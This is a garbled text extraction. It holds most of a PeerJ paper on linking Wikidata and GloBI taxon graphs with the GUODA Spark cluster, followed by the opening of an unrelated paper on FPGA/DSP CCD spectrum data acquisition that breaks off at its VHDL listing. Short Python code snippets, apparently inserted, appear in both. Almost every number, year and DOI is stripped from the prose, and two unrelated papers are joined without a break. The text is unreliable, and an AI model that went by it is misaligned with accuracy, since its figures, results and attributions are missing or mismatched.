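(taxa.groupBy("kingdom")        # hypothetical column name
     .count()
     .orderBy("count", ascending=False)
     .show(10))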
figure guoda infrastructure. data from biodiversity databases is loaded into guoda as parquet files (storage). when a user working in a jupyter notebook (front-end server) triggers a job interactively or via github and jenkins, the data are analyzed using apache spark (compute cluster). this infrastruc- ture allows a user working from a laptop or desktop to compute over multiple biodiversity databases at once. all logos are provided by the organizations they represent and are used with permission. full-size doi: . /peerjcs. /fig- wikidata wikidata (wd) is a free and open knowledge base that provides structured data for wikimedia projects (http://www.wikidata.org; vrandečić & krötzsch, ). similar to wikipedia, anyone can read or edit the resource. information, including links to other resources, can be added to wikidata using bots and batch imports through their data import hub (https://www.wikidata.org/wiki/wikidata:data_import_hub). wikidata information about taxa can be conceptualized as a graph linking related taxa to each other and identifiers from other databases to the taxa they represent (fig. ). every taxon in wikidata is issued a wikidata identifier. while a public wikidata sparql endpoint and associated tools (voß, ) exist, these apis are not suitable for batch processing. for example, when attempting to retrieve all taxa using the public sparql endpoint, a query timeout error was reported. in addition, the apis are expected to return different results over time, so reproducing results is difficult if not impossible. this is why we used a json archive to access wikidata (wikidata, ). globi globi is a database of biotic interactions recorded as organism_ :has_relationship: organism_ (poelen, simons & mungall, ) per individual interaction observation or claim. globi uses a combination of web apis, taxon archives, and name correction/parsing methods in an attempt to link names from species interaction datasets to existing sources. spatial, temporal, and taxonomic coverage in globi is sparse and unevenly distributed (see eltonian shortfall, hortal et al., ), with spatial concentrations in europe and north america and taxonomically concentrated in arthropods, fungi, and plants. only % of thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.wikidata.org https://www.wikidata.org/wiki/wikidata:data_import_hub http://dx.doi.org/ . /peerj-cs. figure frequency of wikidata taxa linked to biodiversity databases. this graph shows the propor- tion of the approximately . million wikidata taxa with zero, one, two, etc. links to external biodiversity databases (ncbi, itis, gbif, eol, fishbase, index fungorum and inaturalist). the majority of wikidata taxa had at least two links. a little more than % of wikidata taxa had no links to external biodiversity databases. full-size doi: . /peerjcs. /fig- taxa in itis are also in globi. a detailed technical description of the globi data model and services has been published elsewhere (poelen, simons & mungall, ). globi maintains a graph of related taxa and their identifiers from different databases (poelen, simons & mungall, ). globi does not introduce its own taxon ids. instead, it records how names were mapped from a source name into an external taxonomic database using a taxon graph (see https://globalbioticinteractions.org/references). we used globi taxon graph v . . (poelen, b). this taxon graph links names and identifiers hierarchically and across resources. 
open tree of life reference taxonomy to assess taxonomic id coverage, the taxa in wikidata and globi were compared to open tree of life reference taxonomy (ott . ; http://files.opentreeoflife.org/ott/ott . /ott . .tgz; rees & cranston, ). ott was built using an automated algorithm with informed choices to aggregate and link existing naming authorities into a reasonably comprehensive, artificial, taxonomy. ott contains , , external links for , , taxa aggregated and linked over five authorities (i.e., gbif, if, silva, worms, ncbi). linking wikidata and globi both wikidata and globi have taxon graphs that map to identifiers from external databases (e.g., ncbi, itis, gbif, eol, index fungorum (if), fishbase and worms). a wikidata dump was loaded into guoda and processed to extract taxon items (about . million) thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://globalbioticinteractions.org/references http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://dx.doi.org/ . /peerj-cs. figure mapping taxon graphs across resources. both globi and wikidata contain hierarchical taxon graphs with each taxon having a ‘‘star’’ of external identifiers. the taxa are mapped across these resources by comparing the portion of the graph with the external identifiers between nodes. in this example, the names and identifiers match perfectly, so a relationship between panthera leo in globi and panthera leo in wikidata is inferred. full-size doi: . /peerjcs. /fig- and their links to ncbi, itis, gbif, eol, if, fishbase and worms. this was the wikidata taxon graph. this taxon graph was loaded into a lookup table where each row contained an ncbi, itis, gbif, eol, if, fishbase or worms identifier and the corresponding wikidata identifier. the globi taxon graph was already in a similarly formatted lookup table. the taxon graphs in globi and wikidata were mapped to each other with a join of the ncbi, itis, gbif, eol, if, fishbase or worms identifiers of the respective lookup tables (fig. ). so, for each external identifier that occurred in both wikidata and globi, the corresponding wikidata identifier inserted in the globi lookup table. for instance, consider wikidata taxon item q (https://www.wikidata.org/wiki/q accessed on march ; panthera leo) points to itis: . with the matching algorithm used, globi now considers wd:q to be linked to all taxon entries that are considered the same as, or synonymous to, itis: . this final joined graph was saved into hdfs as a parquet file and linked entries were appended to globi taxon graph from v . . onward (poelen, c). in addition, the globi ingestion engine was updated to automatically perform the taxon graph matching for future updates. this linkage enabled lookups of diet items of lions by wikidata identifier via https: //www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq and facilitates future integration of species interaction data with wikidata. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.wikidata.org/wiki/q https://www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq https://www.globalbioticinteractions.org/?interactiontype=eats&sourcetaxon=wd% aq http://dx.doi.org/ . /peerj-cs. 
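The join described above can be sketched as follows. The column names and identifier values are illustrative, not the exact Wikidata or GloBI schemas; the point is that linking happens on shared external identifiers rather than on name strings.

from pyspark.sql import SparkSession

spark = SparkSession.builder.appName("wd-globi-link").getOrCreate()

# Both tables map external identifiers to a local taxon entry; all values
# below are made up for the example.
wikidata = spark.createDataFrame(
    [("NCBI:0001", "Q900001"), ("ITIS:0002", "Q900001")],
    ["externalId", "wikidataId"])

globi = spark.createDataFrame(
    [("NCBI:0001", "Panthera leo"), ("GBIF:0003", "Panthera onca")],
    ["externalId", "providedTaxonName"])

# Taxa are linked wherever they share at least one external identifier,
# so the join key is the external ID, not the name string.
linked = globi.join(wikidata, on="externalId", how="inner")
linked.show()

In the actual workflow the same kind of join runs over the full lookup tables stored as Parquet, which is why the mapping completes in minutes.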
taxon graph overlap and consistency ott, wikidata, and globi taxon graphs maintain links to gbif, if, ncbi and worms identifiers (referred to as external identifiers). the taxon graphs are considered to (partially) overlap if individual taxon ids from different graphs have at least one external identifier in common. in addition, a taxon graph is inconsistent if a taxon id links to multiple external identifiers from the same identifier scheme. similarly, overlapping taxon ids are said to be inconsistent if they link to multiple external identifiers from the same identifier scheme. where overlap is a measure for taxon graph similarity, consistency can be seen as a way to measure the relative quality of (overlapping) taxon graphs. for instance, let’s say that ott: is linked to ncbi: , worms: , and gbif: . in addition, wd:q (https://www.wikidata.org/wiki/q ) points to worms: , gbif: , and ncbi: . this would mean that links of these ott and wd ids overlap and are consistent, because they do not point to different names in same naming schemes (fig. ). however, when considering the globi taxon ‘‘id’’ ‘‘globi:null@procladius sp m_pl_ ’’, multiple links to external ids were found (e.g., ncbi: , ncbi: , ncbi: , ncbi: , ncbi: , ncbi: ). in this case, the globi taxon id is inconsistent. the high number of external ncbi identifiers is due to the ncbi taxonomy containing many ‘‘provisional’’ taxa derived from environmental samples. data access all of the input data sets can be found at: https://doi.org/ . /zenodo. (globi taxon graph), http://files.opentreeoflife.org/ott/ott . /ott . .tgz (open tree of life taxonomy) http://doi.org/ . /zenodo. (wikidata). a selection of intermediary and result datasets are available online (poelen, d; poelen, a). all of the scripts used to make the statements in the results can be found here (https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata) with instructions on how to duplicate the analysis. results after min of processing, globi was linked to wikidata using pre-existing identifier mappings. the wikidata dump was gb of compressed json with – million data items. it took about min for guoda to extract taxa (about . million) and their links in wikidata and then less than one minute to map the wikidata taxon graph to the globi taxon graph. the , wikidata links that were added to globi increased its outgoing name links by . % (poelen, d). eighty-seven percent ( . %) of the external identifiers in wikidata overlap with the external identifiers in ott (fig. ). eighty-six percent ( . %) of the external identifiers in globi overlap with the external identifiers in ott (fig. ). wikidata provided mappings for . % of the external identifiers in globi (fig. ). out of the , external identifiers that occurred only in ott and globi, only were inconsistent (https://github.com/bio-guoda/guoda-datasets/blob/ master/wikidata/inconsistentnameidsglobi_ott.tsv). these links pointed to seven thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.wikidata.org/wiki/q https://doi.org/ . /zenodo. http://files.opentreeoflife.org/ott/ott . /ott . .tgz http://doi.org/ . /zenodo. https://github.com/bio-guoda/guoda-datasets/tree/master/wikidata https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobi_ott.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobi_ott.tsv http://dx.doi.org/ . /peerj-cs. figure inconsistent graph matching. 
when overlapping taxon graphs include multiple name strings, the graph is inconsistent. in this example the procladius genus is present in wikidata (red), open tree (textured fill), and globi (blue). the wikidata, ott, and globi taxon graphs overlap on the ncbi and the gbif identifiers (purple and textured fill). the worms identifier overlaps the ott and wikidata taxon graph (red and textured fill). the procladius graph in globi includes ncbi identifiers with a differ- ent name string, procladius (holotanypus), which indicates inconsistent usage. full-size doi: . /peerjcs. /fig- ott ‘‘taxa’’. no inconsistent links were found between wd and globi. out of the , links only found in globi, , were inconsistent (https://github.com/bio-guoda/guoda- datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv). the ott, wikidata, and globi identifier graphs related to this coverage analysis is a mb compressed tab-separated-values file consisting of about million identifier mapping records (see https://zenodo.org/record/ /files/links-globi-wd-ott.tsv.gz). the resulting wikidata taxon objects were merged into globi’s taxon graph (poelen, d). thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentnameidsglobionly.tsv https://zenodo.org/record/ /files/links-globi-wd-ott.tsv.gz). http://dx.doi.org/ . /peerj-cs. figure identifier overlap between wikidata (wd), ott, and globi. this venn diagram shows the number of overlapping external identifiers that can be found in one of three databases. only , ex- ternal ids can be found in all three. these consisted of , worms links, , ncbi links, , gbif links and , if links. over two million ids are only known to one of the three databases. ott contains more than half of the external ids in wikidata and in globi, but neither contain half of the exter- nal ids in ott. mapping wikidata to globi matched . % of the external ids in globi. full-size doi: . /peerjcs. /fig- in order for a mapping to be considered consistent, there can only be one identifier per resource included in each local graph. thus, after removing the inconsistent identifiers, the external id overlap can be interpreted as an estimate of the number of shared taxon names between two databases (table ). this cannot be interpreted as total taxa in each resource. discussion guoda is a high performance computing resource for biodiversity science that provides scalable solutions for working with large data sets in a collaborative, online environment. the min processing time for gb of compressed json is far faster than any current mapping method used in biodiversity; however, it does benefit from the mapping already completed inside wikidata. for example, the wikidata entry for panthera leo (https://www.wikidata.org/wiki/q ) has links to external databases, not all of them thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.wikidata.org/wiki/q http://dx.doi.org/ . /peerj-cs. table absolute and relative link counts from ott, wd, and globi compared to worms, gbif, index fungorum (if), and ncbi. worms gbif if ncbi combined ott , ( %)* , , ( %) , ( %) , , ( %) , , ( %) wd , ( %) , , ( %) , ( %) , ( %) , , ( %) globi , ( %) , ( %) , ( %) , ( %) , , ( %) notes. *overlap between each resource and ott is set at %. 
the other percentages give a relative estimate of size and scale and should not be interpreted as overlapping ids. biodiversity-related. this linking may be based on matching name strings. other efforts using name-string-matching to link biodiversity databases take much longer to map resources together. for instance, eol takes more than a day to map the content it receives from providers to a unified classification (j rice, pers. comm., ). similarly, the taxon matching in bionames and linkout took days to complete (r page, pers. comm., ). projects like ott, wikidata, and globi that keep identifier-based taxonomic graphs make it easier to link databases at scale. despite the notoriously poor nature of taxon names as identifiers, they are still commonly used to link biodiversity data. a much-discussed solution has been the use of universal, unique, persistent, resolvable identifiers across the biodiversity data landscape, but the social barrier to a universal identifier system has, thus far, proven insurmountable (nimis, ; hardisty, roberts & the biodiversity informatics community, ). rather than rely on name strings or a universal identifier system, this method uses the graph of identifiers to map taxa across two databases. this identifier-based method has the potential to be faster and easier than name-string matching without some of the social difficulties of a single identifier system. most biodiversity databases and nomenclatural authorities expose their data in idiosyncratic ways that are not suitable for batch processing. if data sources published their taxon identifier graph as a lookup table (as described in this paper) integrating across databases would be much easier (fig. ). now, users have to learn a unique format for every data source. these lookup tables have the advantage of being easy to version and integrate. in addition to fast linking of biodiversity databases, comparison of identifier graphs may be a scalable way to find inconsistencies, especially when multiple biodiversity databases/identifiers are included. by linking globi to ott and wd, inconsistent names or false positive name matches were detected by considering the (lack of) overlap of globi names with ott and wd external identifier schemes. these inconsistencies might be introduced by a dataset or a name resolution method that produces ambiguous results. in addition, inconsistencies can indicate a disputed/outdated name like ‘‘globi:null@senecio pectinatus’’ which maps to gbif: and gbif: . this would be considered an inconsistent mapping and suggests that senecio pectinatus is an outdated name. a related method using a variation of the pagerank algorithm (page et al., ; brin & page, ) to identify the most legitimate taxonomic name to apply to a fossilized specimen (huber & klump, ) gives further legitimacy to this concept. combining the speediness with thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example look up table. this figure is an excerpt from the globi look up table. the provided- taxonid and the providedtaxonname come from the taxon graph external to globi. the resolvedtax- onid and the resolvedtaxonname are the names and identifiers that are already mapped within globi. each row represents a mapping from a taxon in an external source (pluvialis obscura) to an identifier from a source already in globi, which does not mint its own identifiers. full-size doi: . /peerjcs. 
/fig- the promise of scalability, a near-real-time name consistency check can be implemented to detect inconsistencies across various systems in the biodiversity data-ecosystem introduced by integration bugs, taxonomy updates or differences of interpretation. guoda has been available since and contains data dumps from gbif, eol traitbank, inaturalist, idigbio, and bhl which are all accessible via a jupyter notebook, web services, or apache spark shell on the command line. despite its computing power and successful demonstrations at major conferences, guoda has not been used to its full potential. the barrier of learning new programming and computing paradigms as well as developing an understanding of large dataset work flows seems to be a barrier to many in the biodiversity community. despite this, guoda is being used in several capacities. the effechecka application generates taxonomic checklists using a web interface that allows a user to draw a polygon on a map and returns a deduplicated list of taxa aggregated from observation data held in gbif, inaturalist, etc. the eol freshdata project uses it to enable the detection of new occurrence records given geospatial and taxonomic and data source constraints and notifies interested users via email. several workshops have used it to teach spark programming skills to students at the university of florida. future work on the guoda infrastructure includes training and evaluating neural network models on image data, containerization of the guoda components to allow the system to be run in additional data centers, and refinement of the end-user interface to integrate programming, source code, and publication to make research more reproducible. guoda’s most impactful contribution has likely been the availability of readily formatted biodiversity data and new data sets will continue to be added to the collaboration platform, enabling domain experts and technical experts to answer new questions in the future. the bottlenecks in processing for hadoop file system and apache spark are the number of cpus, amount of memory, and available storage space allocated to the computer cluster. both hdfs and spark are designed to scale horizontally by adding commodity servers (aka thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nodes) to increase the processing power, working memory, and storage space. thus, this problem is immediately solvable. internet bandwidth to transfer the data archives from open tree of life, wikidata, and globi does not scale and is not something that can be addressed solely within our research group. at the moment, it takes longer to download the wikidata resource than it does to run the linking process discussed in this manuscript. socio-technical bottlenecks include resource-limitation and user education. increased usage and operational support is expected to positively impact processing performance by encouraging pro-active bug fixing and infrastructure maintenance. in addition, while the technical complexity of operating and using a compute cluster have been dramatically reduced since the introduction of hadoop in , some re-education may be needed to effectively use these powerful data tools (e.g., jupyter notebooks, hdfs, scala). 
guoda, and hosted data analytics infrastructure in general, has the potential to drastically improve biodiversity science by making multiple biodiversity databases accessible to scientists for analysis on their laptop or desktop. users still need to have some programming skills, which have now become an essential skill in biodiversity science. conclusions sharing information between biodiversity databases can be difficult because of the amount and heterogeneity of the data and the identifiers. most mappings are done using taxonomic name strings at great expense. we were able to map wikidata to globi in min using identifier graphs and guoda, a high performance computing infrastructure developed through collaboration between diverse players. the mapping increased globi’s outgoing name links by . %. this method of mapping across databases using identifier graphs is faster than comparing name strings and can help find inconsistencies that point to a disputed or outdated name. guoda, and systems like it, have the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing resources that are accessible from a laptop or desktop. acknowledgements the authors would like to acknowledge support and resources provided by the acis lab. the authors would like to acknowledge josé a.b. fortes for providing infrastructure and creating room for collaboration. the authors would like to thank the two reviewers for their insightful comments that greatly improved the manuscript. the encyclopedia of life and idigbio helped establish an informal yet pragmatic cross-institutional collaboration. additional information and declarations funding funding was provided by david rubenstein and the encyclopedia of life and by idigbio, nsf award . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nsf award: . competing interests the authors declare there are no competing interests. author contributions • anne e. thessen analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • jorrit h. poelen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • matthew collins contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper. • jen hammock authored or reviewed drafts of the paper, provided collaborative space and leadership. data availability the following information was supplied regarding data availability: poelen, jorrit h. ( ). global biotic interactions: taxon graph (version . . ) [data set]. zenodo. http://doi.org/ . /zenodo. . wikidata. ( ). wikidata dump - - [data set]. zenodo. http://doi.org/ . /zenodo. poelen, jorrit. ( ). gb in min: data linking across major biodiversity databases: data supplements (version . ) [data set]. zenodo. available at http: //doi.org/ . /zenodo. 
references bingham hc, doudin m, weatherdon lv, despot-belmonte k, wetzel ft, groom q, lewis e, regan e, appeltans w, güntsch a, mergen p, agosti d, penev l, hoffmann a, saarenmaa h, geller g, kim k, kim h, archambeau as, häuser c, schmeller ds, geijzendorffer i, garcía camacho a, guerra c, robertson t, runnel v, valland n, martin cs. . the biodiversity informatics landscape: elements, connections and opportunities. rio :e doi . /rio. .e . brin s, page l. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems ( – ): – doi . /s - ( ) -x. hardisty a, roberts d, the biodiversity informatics community. . a decadal view of biodiversity informatics: challenges and priorities. bmc ecology : doi . / - - - . hindman b, konwinski a, zaharia m, ghodsi a, josepyh ad, katz r, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://dx.doi.org/ . /rio. .e http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. center. in: proceedings of the th usenix conference on networked systems design and implementation. berkeley: usenix association, – . hortal j, de bello f, diniz-filho jaf, lewinsohn tm, lobo jm, ladle rj. . seven shortfalls that beset large-scale knowledge of biodiversity. annual review of ecology, evolution, and systematics ( ): – doi . /annurev-ecolsys- - . huber r, klump j. . charting taxonomic knowledge through ontologies and rank- ing algorithms. computers & geosciences : – doi . /j.cageo. . . . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, jupyter de- velopment team. . jupyter notebooks—a publishing format for reproducible computational workflows. in: loizides f, schmidt b, eds. positioning and power in academic publishing: players, agents and agendas. amsterdam: ios press, – . nimis pl. . a tale from bioutopia: could a change of nomenclature bring peace to biology’s warring tribes? nature ( ): doi . / . page l, brin s, motwani r, winograd t. . the pagerank citation ranking: bringing order to the web. technical report. palo alto: stanford digital library technologies project. page rdm. . tbmap: a taxonomic perspective on the phylogenetic database treebase. bmc bioinformatics ( ): doi . / - - - . page rdm. . biodiversity informatics: the challenge of linking data and the role of shared identifiers. briefings in bioinformatics ( ): – doi . /bib/bbn . page rdm. . linking ncbi to wikipedia: a wiki-based approach. plos currents :rrn doi . /currents.rrn . page rdm. . bionames: linking taxonomy, texts, and trees. peerj :e doi . /peerj. . parr cs, wilson n, leary p, schulz ks, lans k, walley l, hammock ja, goddard a, rice j, studer m, holmes jtg, corrigan jr rj. . the encyclopedia of life v : providing global access to knowledge about life on earth. biodiversity data journal :e doi . /bdj. .e . poelen j. a. gb in min: data linking across major biodiversity databases: data supplements. version . . zenodo doi . /zenodo. . poelen j. b. global biotic interactions: taxon graph. version . . . zenodo doi . /zenodo. . poelen j. c. global biotic interactions: taxon graph. version . . . zenodo doi . /zenodo. . poelen j. d. global biotic interactions: taxon graph. version . . . 
zenodo doi . /zenodo. . poelen jh, simons jd, mungall cj. . global biotic interactions: an open infras- tructure to share and analyze species-interaction datasets. ecological informatics : – doi . /j.ecoinf. . . . thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /annurev-ecolsys- - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bib/bbn http://dx.doi.org/ . /currents.rrn http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /peerj-cs. rees ja, cranston k. . automated assembly of a reference taxonomy for phyloge- netic data synthesis. biodiversity data journal :e doi . /bdj. .e . shvachko k, kuang h, radia s, chansler r. . the hadoop distributed file system. in: msst’ proceedings of the ieee th symposium on mass storage systems and technologie. piscataway: ieee computer society, – . voß j. . wikidata-taxonomy . . . version . . . zenodo doi . /zenodo. . vrandečić d, krötzsch m. . wikidata: a free collaborative knowledgebase. commu- nications of the acm ( ): – doi . / . wikidata. . wikidata dump - - . zenodo. doi . /zenodo. . zaharia m, xin rs, wendell p, das t, armbrust m, dave a, meng x, rosen j, venkataraman s, franklin mj, ghodsi a, gonzalez j, shenker s, stoica i. . apache spark: a unified engine for big data processing. communications of the acm ( ): – doi . / . thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center a fast optical spectrum data acquisition method based on fpga and dsp liqun xu , gong jiaming . atkins rd little rock, ar, usa, , liqunxu @gmail.com . xian university of posts & telecomm. , gjm@xiyou.edu.cn abstract. this paper presents a fast ccd optical spectrum data acquisition method based on fpga, fifo and dsp. introduces a linear ccd timing sequence control signal generation and high speed adc interface with fifo and dsp in detail, publishes this design key parts fpga logic schematic and vhdl source code, provides a general solution for universal high speed ccd optical spectrum data acquisition and analysis system. keywords: linear ccd, fpga, fifo, dsp . introduction fiber spectrometer is the key parts in portable raman spectrometers, it is composed of linear ccd detector , optical parts (filter, diffraction grating, lens etc) and data acquisition, store and processing circuit part, but how do to fast sample and save this optical spectrum data into pc is a critical issue for the fiber spectrometers. so this paper presents a powerful method of fast ccd data acquisition, introduces the method and key parts implement hardware schematic and fpga vhdl source code in detail. . system design based on fpga and dsp whole system level hardware design digram is showed as figure , in this design, ilx linear ccd is selected as optical spectrum detector, in order to obtain high snr and high resulation in this system, a high performance bit sar adc chip ad is used, also an asynchronized fifo ram has been used as bridge between the adc and dsp, fpga is used to generate variety ccd timing clock and asynchronized fifo control signal. 
tms vc a dsp is used as a whole system center control unit, because of it’s fast data processing ability,low power consumption and built in usb . port. so by using this dsp chip, the ccd sampling optical spectrum data can be fast transmitted to dsp internal sram and then do raman data analyzing algorithm, also taking advantage of this dsp usb . port, the sampling data can be fast sent to pc. with dsp powerful mcbsp communication port, the dsp chip can easy send the command to fpga and laser control driver. tft color display is a option in future product update. a d c linear ccd detector ccd control signal ccd analogy ccd clock pulse generator circuit latch and fifo tms vc a dsp signal generator adc control data bus d ~d ext int mcbsp serial to parallel fpga and dsp communciation usb . pocket pc mcbsp ext int serial to parallel tft color lcd key scan control ic sda i c bus scl key pads max ep ct c fpga convst busy emif laser control circuit mcu communciation though spi to dsp output signal mcbsp fig . raman spectrometer system digram . linear ccd time sequence signal generation and optical spectrum data aacquisition a. ilx linear ccd time suquence signal generation the ilx is ccd linear image sensor, it’s feature: pixels, µm x µm ( µm pitch), single v power supply, ultra-high sensitivity, built-in sample-and-hold circuit, maximum clock frequency is mhz, its wavength range from ~ nm, it is well fit to raman spectrum data analying wavelength range, when use a nm laser source. figure shows this ccd detector time sequence diagram, figure shows its analog output waveform, so in order to driver ilx ccd , external driver circuit has to provide two time sequence control signal : one is ccd clock signal Φclk , it’s maximum frequency is mhz, tpical working in mhz. another is timing driver signal Φrog. the Φrog pulse period decides the scan a frame pixel time and ccd exposure time, since a frame has pixel + dummy signal = clock pulse, so scaning a frame ccd pixel needs at least clocks signal period, and the true effective clock generated analog signal , which is sensitive optical exposure source, has only pulse. so ccd time sequence signal generation module has to have function as follows: ) gernerates Φrog pulse , Φrog period > x Φclk period; ) generates more than clock pulse Φclk; ) generates clock pulse with duty cycle % Φadc_const, which is corrposed ccd output analog signal and synchronized to start adc convter. the ccd_rog negative pulse enable the ccd output effective and let the ccd exposured piexl convter analog signal output by ccd clk clock driving . so how to create these three control pulse is the design key point. fig ilx linear ccd clock timing diagram fig ccd analog output ccd rog ccd clk adc const a frame ccd scan time sequnce > clock pulse clock pulse fig. key ccd control pulse waveform figure displays this three control pulse waveform, and figure presents their fpga loglic function schematic. in this design, a stable mhz clock source can be obtained though fpga internal pll , divide this mhz clock source into mhz with % duty cycle using a divider, this mhz clock function as whole ccd driving clock source, the ccd and adc time sequence control signal generation module is show in figure . in order to obtain a Φ rog signal , use a divider to get a us width pulse as a rog generator, the Φrog period is controlled by reciving parameter though mcbsp port coming from dsp. 
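The relationship between the clock frequency, the frame length and the ROG period can be checked with simple arithmetic. The values below are assumptions for illustration (the sensor's exact pixel and dummy counts are not restated here), but the constraint is the one described above: the ROG period must span at least one full frame of clock pulses, and it also fixes the exposure time.

CLOCK_HZ = 2_000_000      # assumed pixel clock
ACTIVE_PIXELS = 2048      # assumed active pixels per frame
DUMMY_PIXELS = 32         # assumed dummy/leading pixels

frame_clocks = ACTIVE_PIXELS + DUMMY_PIXELS
frame_time_s = frame_clocks / CLOCK_HZ
print(f"one frame needs {frame_clocks} clock pulses "
      f"= {frame_time_s * 1e3:.3f} ms at {CLOCK_HZ / 1e6:.1f} MHz")

# The ROG period must cover at least one full frame; choosing a longer
# period simply lengthens the exposure (integration) time.
for rog_period_ms in (1.1, 5.0, 20.0):
    covers_frame = rog_period_ms * 1e-3 >= frame_time_s
    print(f"ROG period {rog_period_ms:>5.1f} ms -> "
          f"exposure {rog_period_ms:>5.1f} ms, covers a full frame: {covers_frame}")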
fig . ccd and adc time sequence control signal generation module diagram.

in figure , module inst implements the Φrog pulse generation function and module inst implements the ccd clk and adc start pulse signals. figure shows the simulated waveforms of this signal generation. the vhdl code of the inst and inst modules is presented below; the inst vhdl used in figure is the same, except that it adds the fifo control function. as the simulation result in figure shows, the generated signals meet the ccd control timing requirements exactly.

fig . ccd and adc timing sequence generation waveforms.

b. ccd data sampling and transfer into dsp internal sram
how to transfer the sampled ccd data quickly into the dsp internal sram is the second key design point. the tms vc a dsp operates fastest when its core clock works at mhz, while the ccd scan clock frequency is mhz. if the mhz pixel clock directly triggered the dsp external interrupt, the required data rate could not be achieved, because interrupt latencies prevent the dsp from reacting fast enough even when direct memory access (dma) transfers are used, and the high data rate would tie up most of the i/o port bandwidth and degrade the overall dsp efficiency. an ideal solution is to use a fifo as a buffer bridge: once a whole frame of ccd pixels has been sampled and stored in the fifo, the data block can be read in a burst from the fifo into the dsp sram in dma mode. figure gives the complete ccd and fifo control signal fpga schematic; the lpm_counter is used only to simulate the adc input data. although altera fpgas provide rich fifo resources, their practical use has a number of pitfalls. the w_req and r_req signals have to be set strictly; usually the w_full and rdempty outputs are used for monitoring, but in practice using r_req to start the external read works better than using w_full. in figure , the rdempty output indicates that the fifo can be read, so r_req is used as the dsp external interrupt trigger. in the dsp interrupt response routine the whole data block is read; when the dsp performs an emif read it generates an are signal, which is used as the synchronized fifo read clock r_clk. in the schematic, the adc_start_ctr module provides the adc start signal, and the adc busy output is used as the fifo write clock, which means that only when the adc finishes a conversion is the converter data valid and saved to the fifo ram. as figures and show, when r_req becomes ready the adc_out data is not yet valid and one r_clk cycle must be waited; therefore, with r_req as the dsp interrupt source, the interrupt service routine discards the first word and keeps reading with the dma counter, so that the complete sampled data from d[ ] to d[ ] is read into the dsp sram. fig. shows the simulation result of the design in figure : w_clk is set to ns and r_clk to ns, i.e., r_clk is times faster than w_clk, and the result shows that the data block is read times faster than it is written. this successfully solves the difficulty of the asynchronous read and write speeds of the adc and the dsp.
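a rough model of this buffering scheme fits in a few lines of python; the frame size, adc rate and burst read rate below are assumed illustrative numbers rather than the values of this design, and are only meant to show why the fifo decouples the two clock domains.

------- fifo buffering budget sketch (python, assumed values)
FRAME_WORDS = 2048 + 32          # assumed effective + dummy words per frame
ADC_RATE_HZ = 2_000_000          # assumed write rate (adc busy clock)
EMIF_RATE_HZ = 8_000_000         # assumed burst read rate (r_clk)

fill_time = FRAME_WORDS / ADC_RATE_HZ      # time to capture one frame into the fifo
drain_time = FRAME_WORDS / EMIF_RATE_HZ    # time the dsp needs to burst-read it

print("frame fill time : %.3f ms" % (fill_time * 1e3))
print("frame drain time: %.3f ms" % (drain_time * 1e3))
# as long as drain_time is well below fill_time, the dsp can read one frame
# in a single dma burst while the next frame is still being exposed, so no
# samples are lost and no per-sample interrupts are needed.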
fig. . ccd and fifo control signal schematic. fig. . ccd and fifo control signal simulation waveform. fig. . data read, initial side. fig. . data read, end side.

c. fpga control module vhdl source code
------- ccd rog signal generation vhdl
library ieee;
